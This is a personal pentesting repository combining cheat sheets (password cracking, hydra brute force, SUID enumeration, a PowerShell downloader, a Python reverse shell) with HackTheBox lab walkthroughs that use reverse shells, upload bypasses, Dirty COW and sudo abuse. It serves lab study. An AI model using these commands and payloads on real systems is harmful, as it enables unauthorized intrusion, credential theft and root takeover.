`cd drive/'My Drive'/dothashcat/hashes` and run hashcat 11 | 12 | # Hashcat 13 | ```console 14 | $ hashcat -m -a 0 -o crack.txt 'hash' /usr/share/wordlists/rockyou.txt --force 15 | $ hashcat -m 13100 -a 0 hash.txt Pass.txt --force # kerberos 16 | ``` 17 | # john 18 | ```console 19 | root@kali:~# john -wordlist=/usr/share/wordlists/rockyou.txt 20 | ``` 21 | -------------------------------------------------------------------------------- /CheatSheet/enum.md: -------------------------------------------------------------------------------- 1 | # Tools 2 | - linpeas.sh 3 | - suid3num.py 4 | - pspy 5 | - ltrace 6 | - enum4linux 7 | 8 | 9 | # links 10 | - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 11 | 12 | # get linux OS info 13 | - https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/ 14 | ```console 15 | $ cat /etc/*release 16 | $ uname -a 17 | ``` 18 | 19 | # TTY shell 20 | ```console 21 | $ python -c 'import pty; pty.spawn("/bin/bash")' 22 | $ python3 -c 'import pty; pty.spawn("/bin/sh")' 23 | $ echo os.system('/bin/bash') 24 | $ /bin/sh -i 25 | ``` 26 | now `^z` (background) it 27 | ``` 28 | stty raw -echo;fg 29 | export TERM=xterm 30 | ``` 31 | auto tab is good to go! 
32 | # Linux capacity 33 | ```console 34 | $ getcap -r / 2>/dev/null 35 | ``` 36 | # cronjob 37 | ```console 38 | $ for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done 39 | ``` 40 | 41 | # echo "#!/bin/bash" 42 | ```console 43 | $ set +H 44 | $ echo "#!/bin/bash" > shell.sh 45 | ``` 46 | 47 | # enum4linux 48 | @ `/usr/share/enum4linux/enum4linux.pl` by default 49 | - samba/smb 50 | ```console 51 | /usr/share/enum4linux/enum4linux.pl -U 10.10.223.29 # user 52 | /usr/share/enum4linux/enum4linux.pl -S 10.10.223.29 # sharelist 53 | ``` -------------------------------------------------------------------------------- /CheatSheet/etc.md: -------------------------------------------------------------------------------- 1 | ## tty shell 2 | ```console 3 | $ python3 -c "import pty; pty.spawn('/bin/bash')" 4 | www-data@startup:/$ ^Z 5 | zsh: suspended nc -nlvp 6969 6 | 7 | ┌──(kali㉿kali)-[~/THM/startup] 8 | └─$ stty raw -echo;fg 148 ⨯ 1 ⚙ 9 | [1] + continued nc -nlvp 6969 10 | # enter to go back to nc sesstion 11 | www-data@startup:/$ export TERM=xterm # auto tab 12 | 13 | ``` 14 | ## SSH "Konami Code" (SSH Control Sequences) 15 | link [here](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/) 16 | 17 | ## SUID 18 | use **suid3num.py** 19 | ```console 20 | $ find / -user root -perm -4000 -exec ls -ldb {} \; 2> /dev/null # scan the whole file system to find all files with the SUID bit set that is own by root 21 | $ find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null 22 | $ find / -perm -u=s -type f 2>/dev/null 23 | $ find / -perm -4000 -exec ls -ldb {} \; 2> /dev/null # same as about but own by any user 24 | $ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null # both SUID and SUIG 25 | ``` 26 | ## nmap 27 | ```console 28 | $ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP #smb 29 | $ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # rpcbind 30 | ``` 31 | ## 
powershell
```
powershell -command "IEX (New-Object System.Net.WebClient).Downloadfile('http://<ip>:<port>/shell2.exe','shell2.exe')"
powershell -c "Invoke-WebRequest -Uri 'web' -OutFile 'out'"
```

### hydra
Credit: noxtal's cheatsheet, see [here](https://noxtal.com/cheatsheets/2020/07/24/hydra-cheatsheet/).
```console
$ hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 64 ssh
$ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP mysql
$ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP ftp
$ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP smb
$ hydra -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"
$ hydra -f -t 64 -l user -P /usr/share/wordlists/rockyou.txt $IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' # wordpress
$ hydra -f -t 64 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP
$ hydra -t 64 -l username -P /usr/share/wordlists/rockyou.txt pop3://$IP # pop3
$ hydra -L users.txt -P pass.txt telnet://target.server # telnet
```
## Reverse SSH port forwarding
```console
$ ssh -L <local_port>:<remote_host>:<remote_port> <user>@$IP
```
Note that `-L` forwards a local port to a host reachable from `$IP`; a true reverse forward (exposing one of your own ports on `$IP`) uses `-R` with the same `port:host:port` syntax.
## python revs shell
```py
import socket
import pty
from os import dup2  # dup2 was called below without being imported

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<kali ip>", 9696))
dup2(s.fileno(), 0)  # stdin
dup2(s.fileno(), 1)  # stdout
dup2(s.fileno(), 2)  # stderr
pty.spawn("/bin/bash")
```


## curl
```console
kali@kali:~$ curl http://10.10.10.204:8081/ctf/get
thm{162520bec925bd7979e9ae65a725f99f}kali@kali:~$ ^C
kali@kali:~$ curl -d 'flag_please' http://10.10.10.204:8081/ctf/post
thm{3517c902e22def9c6e09b99a9040ba09}kali@kali:~$ ^C
kali@kali:~$ curl http://10.10.10.204:8081/ctf/getcookie
Check your cookies!kali@kali:~$ curl http://10.10.10.204:8081/ctf/getcookie -i
HTTP/1.1 200 OK
Set-Cookie: flag=thm{91b1ac2606f36b935f465558213d7ebd}; Path=/
Date: Fri, 17 Jul 2020 12:44:02 GMT
Content-Length: 19
Content-Type: text/plain; charset=utf-8

Check your cookies!
kali@kali:~$ curl http://10.10.10.204:8081/ctf/sendcookie -i --cookie flagpls=flagpls
HTTP/1.1 200 OK
Date: Fri, 17 Jul 2020 12:46:55 GMT
Content-Length: 37
Content-Type: text/plain; charset=utf-8

thm{c10b5cb7546f359d19c747db2d0f47b3}
```



## impacket
```shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain>/<user>:<password> -request -format <hashcat|john> -outputfile <file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain>/ -usersfile <users.txt> -format <hashcat|john> -outputfile <file>
```



## etc
```console
$ usermod -aG sudo [user] # adds a user to the sudo group on Linux
```
--------------------------------------------------------------------------------
/CheatSheet/kali-setup.md:
--------------------------------------------------------------------------------
# todo:
- [ ] https://github.com/DominicBreuker/pspy
# general
```console
kali@kali:~$ sudo apt-get install -y gobuster
kali@kali:~$ sudo apt-get install -y python3-pip
kali@kali:~$ sudo apt-get install -y openvpn
kali@kali:~$ sudo apt-get install -y seclists # seclists wordlists!!
kali@kali:/opt$ sudo wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
kali@kali:~$ sudo apt-get install -y golang # go
kali@kali:~$ sudo apt-get install -y steghide
kali@kali:~$ sudo apt-get install -y remmina # rdp tool
kali@kali:~$ sudo apt-get install -y evolution # email client app
```
or
```console
kali@kali:~$ sudo apt-get install -y gobuster python3-pip openvpn seclists golang steghide remmina evolution
```
# terminator
- [unlimited-scroll](https://askubuntu.com/questions/618464/unlimited-scroll-in-terminator)
```console
$ sudo apt-get install terminator
$ nano ~/.config/terminator/config # open the terminator config file
```
Under the `[profiles]` entry add these lines:
```
[[default]]
scrollback_infinite = True
```
Now save, exit and restart terminator. Enjoy.

# pymap
```console
kali@kali:/opt$ sudo wget https://raw.githubusercontent.com/gu2rks/pymap/master/pymap.py
kali@kali:/opt$ sudo chmod +x pymap.py
```
# impacket
```console
$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
$ cd impacket && pip3 install -r requirements.txt
$ sudo python3 setup.py install
```
# privilege-escalation-awesome-scripts-suite
```console
$ sudo git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
$ sudo mkdir privesc
kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/obj/x64/Release/winPEAS.exe privesc/winPEAS-x64.exe
kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/obj/x86/Release/winPEAS.exe privesc/winPEAS-x86.exe
kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat privesc/
kali@kali:/opt$ sudo cp privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh privesc/
```

# Sipvicious
- https://github.com/EnableSecurity/sipvicious
```console
$ sudo pip3 install sipvicious
```

# Empire
```console
$ cd /opt
$ git clone https://github.com/BC-SECURITY/Empire.git
$ cd Empire
$ sudo ./setup/install.sh
```

# Starkiller
- Empire is required
## Installing
```console
$ cd /opt
$ # Download an up-to-date version of Starkiller from the BC-Security GitHub repo - https://github.com/BC-SECURITY/Starkiller/releases
$ chmod +x starkiller-1.X.X.AppImage
$ sudo ./starkiller-1.X.X.AppImage --no-sandbox
```
## Setting Up Starkiller
```console
$ cd /opt/Empire
$ sudo ./empire --rest # on the 1st terminal run Empire
$ sudo ./starkiller-1.X.X.AppImage --no-sandbox # on a 2nd terminal run Starkiller
```
Default credentials:
- uri: 127.0.0.1:1337
- user: empireadmin
- pass: password123

--------------------------------------------------------------------------------
/HackTheBox/EZ/bashed.md:
--------------------------------------------------------------------------------
# recon
- OS: Linux (TTL 63)
- Apache/2.4.18 (Ubuntu) Server at bashed.htb Port 80

- gobuster
```
/about.html (Status: 200)
/config.php (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/dev (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/php (Status: 301)
/scroll.html (Status: 200)
/server-status (Status: 403)
/single.html (Status: 200)
/uploads (Status: 301)
```
I tried to visit `/uploads/phpbash.php` hoping to get a web shell, since one of the pictures shows that directory, but unfortunately that did not work.

Anyway, after some tries I found a web shell at `/dev` running as `www-data`. I did not like that shell much, so I decided to upload `php-reverse-shell.php` (installed by default on Kali) to `/uploads` and get a reverse shell instead.

# foot hold
grab the user flag and do more recon
```
www-data@bashed:/$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bashed:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```
so let's priv esc to scriptmanager
```
www-data@bashed:/var/www/html/uploads$ sudo -u scriptmanager bash -i
```


# root
```
scriptmanager@bashed:/$ find / -user scriptmanager 2> /dev/null
find / -user scriptmanager 2> /dev/null
/scripts
.
.
```
oh, we own `/scripts`, let's go check
```
scriptmanager@bashed:~$ ls -ls /scripts
ls -ls /scripts
total 12
4 -rw-r--r-- 1 scriptmanager scriptmanager 214 Sep 22 12:17 test.py
4 -rw-r--r-- 1 root          root           18 Sep 21 15:03 test.txt
```
If you keep running `ls -la` you will notice that the file modification times change every minute. The plan is to put a python reverse shell script in there.

You can also confirm the automated job with a tool called `pspy`; if you run it you will see this:
```
2020/09/22 13:15:38 CMD: UID=0    PID=15974  | python test.py
```
This shows that UID 0 (root) is executing `python test.py`. I also tried creating a dummy `test2.py` while monitoring with `pspy`. The result shows that root executes any `.py` in the `/scripts` directory.
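As an added defender-side check (not from the original write-up): the root job here runs whatever `.py` it finds in a directory owned by `scriptmanager`, which is exactly the condition a permissions audit should catch. The Python below flags files and directories that a privileged job executes from but that a non-root account can modify; uid/gid 1001 for scriptmanager are assumed placeholders, and the sample entries are constructed from the `ls -ls /scripts` listing above. The same check applies to a script granted via sudo `NOPASSWD`.

```python
"""Audit files that a privileged job executes for non-root ownership or loose permissions.

Added example, not from the original write-up. It models the Bashed situation:
root runs every .py under /scripts, but the directory and test.py belong to
scriptmanager, so anyone who can become scriptmanager controls what root runs.
"""
import os
import stat
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class Entry:
    path: str
    uid: int   # owning user id
    gid: int   # owning group id
    mode: int  # permission bits only, e.g. 0o644


def audit_entries(entries: Iterable[Entry], trusted_uids=(0,), trusted_gids=(0,)) -> List[str]:
    """Return one finding per way an untrusted account could modify an entry.

    A file (or the directory it lives in) that root executes is a privilege
    escalation path when:
      * it is owned by a user other than root (the owner can rewrite it), or
      * it is group-writable and the group is not a trusted one, or
      * it is world-writable.
    Findings are "<path>: <reason>", in the order the entries are given.
    """
    findings = []
    for e in entries:
        if e.uid not in trusted_uids:
            findings.append(f"{e.path}: owned by uid {e.uid}, not root")
        if e.mode & stat.S_IWGRP and e.gid not in trusted_gids:
            findings.append(f"{e.path}: group-writable by gid {e.gid}")
        if e.mode & stat.S_IWOTH:
            findings.append(f"{e.path}: world-writable")
    return findings


def entries_from_directory(directory: str, suffixes=(".py", ".sh")) -> List[Entry]:
    """Collect Entry records for a directory itself plus the scripts inside it.

    The directory is included because a writable directory lets someone drop a
    new script even when every existing file is locked down.
    """
    st = os.lstat(directory)
    out = [Entry(directory, st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))]
    for name in sorted(os.listdir(directory)):
        if name.endswith(suffixes):
            path = os.path.join(directory, name)
            s = os.lstat(path)
            out.append(Entry(path, s.st_uid, s.st_gid, stat.S_IMODE(s.st_mode)))
    return out


def audit_directory(directory: str) -> List[str]:
    """Audit a directory that a root cron job executes scripts from."""
    return audit_entries(entries_from_directory(directory))


# Constructed sample mirroring the `ls -ls /scripts` output in the write-up.
# uid/gid 1001 stand in for scriptmanager; the real ids are not on the page.
SAMPLE_SCRIPTS = [
    Entry("/scripts", 1001, 1001, 0o755),          # directory owned by scriptmanager
    Entry("/scripts/test.py", 1001, 1001, 0o644),  # -rw-r--r-- scriptmanager
    Entry("/scripts/test.txt", 0, 0, 0o644),       # -rw-r--r-- root
]

if __name__ == "__main__":
    for finding in audit_entries(SAMPLE_SCRIPTS):
        print(finding)
```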


Since nano does not work, I decided to create the python reverse shell on my Kali box and use `wget` to fetch it into `/scripts`. Now open netcat, listen on the given port and... **BOOM!**
```
root@bashed:/scripts# ls
```
--------------------------------------------------------------------------------
/HackTheBox/EZ/blue.md:
--------------------------------------------------------------------------------
# recon
- port + service
```
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open  msrpc        Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
```
- nmap vuln script
```
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
```
- msf5 scanner/smb/smb_version
```
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.40:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:HARIS-PC) (signatures:optional)
```
- `nmap -p445 --script smb-check-vulns.nse`

# foot hold/root
## with metasploit
- `windows/smb/ms17_010_eternalblue`
```
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute whoami
[+] Command execution completed:
nt authority\system
```
- cat Administrator/Desktop/root.txt
## without metasploit
- https://ethicalhackingguru.com/how-to-exploit-ms17-010-eternal-blue-without-metasploit/
--------------------------------------------------------------------------------
/HackTheBox/EZ/lame.md:
--------------------------------------------------------------------------------
# recon
- ports
```
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd
```
- details
```
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.12
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
```
- ftp:
  - vsftpd 2.3.4
  - empty with `ls -la`
```
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
553 Could not create file.
```
- smb:
  - Samba smbd 3.0.20-Debian
  - [CVE-2007-2447](https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script)
```
| smb-enum-shares:
|   account_used:
|   \\10.10.10.3\ADMIN$:
|     Type: STYPE_IPC
|     Comment: IPC Service (lame server (Samba 3.0.20-Debian))
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access:
|   \\10.10.10.3\IPC$:
|     Type: STYPE_IPC
|     Comment: IPC Service (lame server (Samba 3.0.20-Debian))
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\10.10.10.3\opt:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access:
|   \\10.10.10.3\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 1
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|   \\10.10.10.3\tmp:
|     Type: STYPE_DISKTREE
|     Comment: oh noes!
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|_    Anonymous access: READ/WRITE
```
- distccd v1
  - [CVE-2004-2687](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)


# foot hold.
Choose your path: there are 3 exploits you can use. If you aim for OSCP, don't use Metasploit if you don't have to.
I chose `CVE-2004-2687` to get a foothold. I tried to use SUID binaries to priv esc to root, but it did not work...
```
[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
/usr/bin/nmap -~> https://gtfobins.github.io/gtfobins/nmap/#suid
------------------------------


[&] Manual Exploitation (Binaries which create files on the system)
------------------------------
[&] Nmap ( /usr/bin/nmap )
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
/usr/bin/nmap --script=$TF

------------------------------
```
just a dump
```bash
bash -i >& /dev/tcp/10.10.14.12/6969 0>&1
```
## root
So SUID didn't work; I took a step back and went through the recon results again. I then chose `CVE-2007-2447` to gain root access, using this script on GitHub: https://github.com/amriunix/CVE-2007-2447. It is straightforward: `wget` the exploit and `pip` install all requirements. The `readme.md` explains clearly how to use the script.

```
kali@kali:~/script$nc -nlvp 6969h
listening on [any] 6969 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.3] 52344
whoami
root
```
--------------------------------------------------------------------------------
/HackTheBox/EZ/legacy.md:
--------------------------------------------------------------------------------
# recon
- port + version
```
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
```
- OS: Windows XP (Windows 2000 LAN Manager)
- 445 microsoft-ds Windows XP microsoft-ds
  - [MS08-067](https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi)
  - [CVE-2008-4250](https://nvd.nist.gov/vuln/detail/CVE-2008-4250)
  - python exploit
    - https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
    - https://github.com/andyacer/ms08_067
    - [how to](https://ivanitlearning.wordpress.com/2019/03/03/ms08-067-exploitation-pass-the-hash-without-metasploit/)

```
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
```

# foot hold + root
- use `exploit/windows/smb/ms08_067_netapi`: set rhost and lhost, then run.
- to get root: `getsystem` in meterpreter.

--------------------------------------------------------------------------------
/HackTheBox/EZ/nibbles.md:
--------------------------------------------------------------------------------
# recon
- 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Found some hidden text in index.html, which leads us to `nibbles.htb/nibbleblog/`.

now gobuster!!!
```
/README
/admin (Status: 301)
/content (Status: 301)
/languages (Status: 301)
/plugins (Status: 301)
/themes (Status: 301)
```

- /nibbleblog/README
```
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
```
- /nibbleblog/admin.php is a login page. I guessed and luckily got in with `admin:nibbles`.

Some digging turned up this link from [wikihack](https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/).

Okay, let's find our shell on Kali:
```console
kali@kali:/opt$ sudo find / -name php-reverse* 2> /dev/null
/usr/share/webshells/php/php-reverse-shell.php
```
Copy it and modify the IP and port, then:
1. upload the shell as the guide says
2. start `nc` listening for the incoming reverse shell
3. visit nibbles.htb/nibbleblog/content/private/plugins/my_image/my_image.php

BOOM! Go grab the flag.

There is a zip file called personal.zip. In it I found a .sh called monitor.sh that looks interesting:

```console
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
```
I googled a bit about **tecmint monitor** but didn't find anything juicy about the script.


Escape the jail shell by running `python3 -c 'import pty; pty.spawn("/bin/bash")'`.
Now let's check...

- sudo -l
```console
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
Since I can't use `vi` or `nano`, I decided to create monitor.sh on my Kali box, run a python web server and `wget` it from the victim. Here is the content of `monitor.sh`:
```console
kali@kali:~/HTB/nibbles$ cat monitor.sh
#!/bin/sh
/bin/bash -i
```
Now remove the old .sh and wget the one we created on Kali:
```console
nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh # remove the old one that I unzipped
nibbler@Nibbles:/home/nibbler/personal/stuff$ wget http://10.10.14.8:8888/monitor.sh
...
2020-10-02 15:00:51 (2.39 MB/s) - 'monitor.sh.1' saved [23/23]
```
Now let's get a root shell!
```
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 24
drwxr-xr-x 2 nibbler nibbler  4096 Oct  2 15:02 .
drwxr-xr-x 3 nibbler nibbler  4096 Dec 10  2017 ..
-rw-r--r-- 1 nibbler nibbler 12288 Oct  2 14:50 .monitor.sh.swp
-rwxrwxrwx 1 nibbler nibbler    23 Oct  2 14:56 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cd ..
nibbler@Nibbles:/home/nibbler/personal$ sudo stuff/monitor.sh
sudo stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:/home/nibbler/personal/stuff# whoami
whoami
root
```
Now go grab the root flag.

PS: I kept getting the message `sudo: unable to resolve host Nibbles: Connection timed out`, first when I ran `sudo -l` and now again. After googling around I found a solution, which is to add the hostname to /etc/hosts: `echo "127.0.1.2 Nibbles" >> /etc/hosts`

--------------------------------------------------------------------------------
/HackTheBox/EZ/popcorn.md:
--------------------------------------------------------------------------------
# recon
- 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http Apache httpd 2.2.12 ((Ubuntu))

## gobuster
- /cgi-bin/ (Status: 403) -> forbidden
- /index (Status: 200)
- /rename (Status: 301) `index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name`
- /test (Status: 200) -> phpinfo()
- /torrent (Status: 301) -> Torrent Hoster

### Torrent Hoster
```
/admin (Status: 301)
/.htpasswd (Status: 403)
/browse (Status: 200)
/comment (Status: 200)
/config (Status: 200)
/css (Status: 301)
/database (Status: 301)
/download (Status: 200)
/edit (Status: 200)
/health (Status: 301)
/hide (Status: 200)
/images (Status: 301)
/index (Status: 200)
/js (Status: 301)
/lib (Status: 301)
/login (Status: 200)
/logout (Status: 200)
/preview (Status: 200)
/readme (Status: 301)
/rss (Status: 200)
/secure (Status: 200)
/stylesheet (Status: 200)
/templates (Status: 301)
/thumbnail (Status: 200)
/torrents (Status: 301)
/upload (Status: 301)
/upload_file (Status: 200)
/users (Status: 301)
/validator (Status: 200)
```
Always walk the happy path first to understand the application. I noticed that I can upload a picture to the server after publishing a torrent. I uploaded a picture of a cute cat, and the picture was saved in `/torrent/upload/`.


So we can try to upload a malicious php as a picture and visit `/torrent/upload/` to execute the file.... It didn't work, so I ran `burp` to intercept the request and check it out.
```
Content-Disposition: form-data; name="file"; filename="cutiecat.php.png"
Content-Type: image/png
```
I changed `filename="cutiecat.php.png"` to `filename="cutiecat.php"`. Now check the page `/torrent/upload/` to see whether our reverse shell got uploaded, and BOOM, it is there. Now view our .php to get a reverse shell!!
```
[10.10.14.43]-kali@kali:~/HTB/popcorn$ nc -nlvp 6969
listening on [any] 6969 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.6] 51870
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 17:36:03 up 13:22,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@popcorn:/$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root   root   4096 Mar 17  2017 .
drwxr-xr-x 21 root   root   4096 Oct 31 04:13 ..
drwxr-xr-x  3 george george 4096 Oct 26 19:35 george
www-data@popcorn:/home/george$ ls -l
ls -l
total 836
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Oct 31 04:14 user.txt
```
Nice, we have `r` permission on george's directory; grab the user flag and let's recon to gain root.
# root
linpeas.sh didn't give much info: we found some passwords for the database and we know that the kernel is old. I also found `motd`.
I tried to exploit popcorn via motd but it didn't work; `dos2unix 14339.sh` didn't help either. When I executed the exploit it asked me for the www-data password, which I do not have... So I went for kernel exploitation instead: dirty cow!
```console
www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@popcorn:/tmp$ chmod +x dirty
chmod +x dirty
www-data@popcorn:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:

Complete line:
firefart:figsoZwws4Zu6:0:0:pwned:/root:/bin/bash

mmap: b7879000
^C
[10.10.14.43]-kali@kali:~/HTB/popcorn$ nc -nlvp 6969
listening on [any] 6969 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.6] 38532
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 19:06:29 up 40 min,  0 users,  load average: 1.79, 1.26, 0.86
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@popcorn:/$ su - firefart
su - firefart
Password:

firefart@popcorn:~# ls
ls
root.txt
```
--------------------------------------------------------------------------------
